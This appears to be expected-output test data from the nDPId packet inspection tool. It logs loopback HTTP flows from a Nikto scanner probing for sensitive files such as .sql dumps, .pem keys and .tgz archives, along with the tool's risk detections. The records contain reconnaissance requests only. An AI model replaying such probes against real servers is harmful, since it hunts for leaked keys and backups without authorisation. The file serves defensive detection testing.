+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277067,"pkt":"AAAAAAAAAAAAAAAACABFAADCfFhAAEAGv9t\/AAABfwAAAcOKH5CRgEQl8Paa6IAYAED+tgAAAQEICp1m\/HOdZvxzR0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277067,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277070,"pkt":"AAAAAAAAAAAAAAAACABFAADCXGdAAEAG38x\/AAABfwAAAcOMH5AiiWQXZDyqFoAYAED+tgAAAQEICp1m\/HadZvx1R0VUIC8wLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277070,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277072,"pkt":"AAAAAAAAAAAAAAAACABFAADDQNZAAEAG+1x\/AAABfwAAAcOOH5A+53ionbjt1YAYAED+twAAAQEICp1m\/HedZvx3R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":259,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277072,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277074,"pkt":"AAAAAAAAAAAAAAAACABFAADDdgpAAEAGxih\/AAABfwAAAcOQH5DZ8k59fiDl9oAYAED+twAAAQEICp1m\/HqdZvx6R0VUIC8xMjcuMC4wLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277074,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277075,"pkt":"AAAAAAAAAAAAAAAACABFAAC9f6pAAEAGvI5\/AAABfwAAAcOSH5AexUfewusNb4AYAED+sQAAAQEICp1m\/HudZvx7R0VUIC8xLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277075,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277077,"pkt":"AAAAAAAAAAAAAAAACABFAAC9i6BAAEAGsJh\/AAABfwAAAcOUH5B4uLPsGcILh4AYAED+sQAAAQEICp1m\/H2dZvx9R0VUIC8xLnNxbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277077,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277078,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VOpAAEAG505\/AAABfwAAAcOWH5Crf2yePds4BoAYAED+sQAAAQEICp1m\/H6dZvx+R0VUIC8xLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":263,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277078,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277079,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DWxAAEAGLs1\/AAABfwAAAcOYH5CSvzUdCWfTlYAYAED+sQAAAQEICp1m\/H+dZvx\/R0VUIC8xLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277079,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277081,"pkt":"AAAAAAAAAAAAAAAACABFAADDZbZAAEAG1nx\/AAABfwAAAcOaH5Ap5V3Dc4s2n4AYAED+twAAAQEICp1m\/IGdZvyBR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":265,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277081,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277083,"pkt":"AAAAAAAAAAAAAAAACABFAADDEYFAAEAGKrJ\/AAABfwAAAcOcH5DxxikK7qXr+IAYAED+twAAAQEICp1m\/IOdZvyCR0VUIC8xMjcuMC4wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277083,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277084,"pkt":"AAAAAAAAAAAAAAAACABFAADFEhNAAEAGKh5\/AAABfwAAAcOeH5AvZipnVfZObIAYAED+uQAAAQEICp1m\/ISdZvyER0VUIC8xMjdfMF8wXzEucGVtIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":267,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277084,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 